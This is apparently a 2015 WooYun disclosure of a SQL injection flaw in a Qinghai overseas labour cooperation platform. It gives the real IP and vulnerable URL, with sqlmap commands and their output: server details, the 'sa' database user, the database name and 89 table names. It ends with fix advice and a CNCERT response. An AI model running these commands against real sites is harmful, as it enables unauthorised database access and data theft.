当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130083

漏洞标题:某对外劳务合作平台sql注入一枚

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-07-30 16:44

修复时间:2015-09-17 11:48

公开时间:2015-09-17 11:48

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-30: 细节已通知厂商并且等待厂商处理中
2015-08-03: 厂商已经确认,细节仅向厂商公开
2015-08-13: 细节向核心白帽子及相关领域专家公开
2015-08-23: 细节向普通白帽子公开
2015-09-02: 细节向实习白帽子公开
2015-09-17: 细节向公众公开

简要描述:

由于对相关参数没有进行输入过滤导致。

详细说明:

青海对外劳务合作平台http://211.138.77.214/

1.png


注入点多,这里选取一例进行演示,测试目标:http://211.138.77.214/XWZX/XWZXDetail.aspx?PKID=1935

2.png


3.png



漏洞证明:

系统信息:
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30128
back-end DBMS: Microsoft SQL Server 2005
当前用户:
python sqlmap.py -u "http://211.138.77.214/XWZX/XWZXDetail.aspx?PKID=1935" --current-user
current user: 'sa'
当前数据库:
python sqlmap.py -u "http://211.138.77.214/XWZX/XWZXDetail.aspx?PKID=1935" --current-db
[23:21:20] [INFO] fetching current database
current database: 'xnlw'
查表:
python sqlmap.py -u "http://211.138.77.214/XWZX/XWZXDetail.aspx?PKID=1935" –tables –D “xnlw”
Database: xnlw
[89 tables]
+-------------------+
| BD_BDJL |
| BD_LX |
| BD_QYMK |
| BD_QY_MAP |
| BD_SJ |
| BD_SJXFL |
| BD_SJXFL |
| BD_YHSJX |
| CRM_LXR |
| GT_NBXJ_MX |
| GT_NBXJ_MX |
| GT_WTXT_HF |
| GT_WTXT_HF |
| GT_WTXT_ZF |
| LM_TPMX |
| LM_TPX |
| LM_TPZT |
| MSG_XXJL |
| MmsGet |
| MmsSEND |
| MobileGet |
| MobileSJZ |
| MobileSendMain |
| MobileSendMain |
| RZ_CZRZ |
| RZ_JGCZRZ |
| RZ_JGCZR_MX |
| RZ_JGCZSH |
| RZ_YHDL |
| SMS_TOREAD |
| SMS_TOSEND |
| S_BBMB |
| S_CHINAXZQH |
| S_DM |
| S_FJ |
| S_GNMK |
| S_Grid_UserConfig |
| S_JSLMQX |
| S_JSQX |
| S_JSXX |
| S_RYXX |
| S_SQL |
| S_TABLE_TEMP |
| S_TABLE_TEMP |
| S_XTXXJS |
| S_YHLMQX |
| S_YHQX |
| S_YHXX |
| S_YHZ_MX |
| S_YHZ_MX |
| S_ZZJGK_GX |
| S_ZZJGK_GX |
| S_ZZJG_QY |
| S_ZZJG_QY |
| Sms_Send |
| WZ_GG |
| WZ_GGW |
| WZ_LMNRMAP |
| WZ_LMNRMAP |
| WZ_LMNRMAP |
| WZ_LYB |
| WZ_RMGJC |
| WZ_YQLJ |
| WZ_ZT |
| WZ_ZXJLGJ |
| XX_BLJL |
| XX_BMSQ |
| XX_BZ |
| XX_ZCFGJDDY |
| XX_ZCFGJDDY |
| XX_ZCFGJDDY |
| XX_ZZ |
| YW_PXXQ |
| YW_XMXX |
| YW_YDHWMX |
| YW_ZPXX |
| ZJ_BF |
| ZJ_SBCZJL |
| ZJ_ZJ |
| ZZ_CPLX |
| ZZ_CPLX |
| ZZ_QYZZ |
| ZZ_XQ |
| ZZ_ZZLM |
| ZZ_ZZZX |
| gbcode |
| gbfqcode |
| gbfqmap |
| mzcode |
+-------------------+
后面表信息就不一一展示了,尽快修复吧。

修复方案:

1.添加放注入模块;
2.部署相关安全厂商防护设备。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-03 11:46

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给青海分中心,由其后续协调网站管理单位处置。

最新状态:

暂无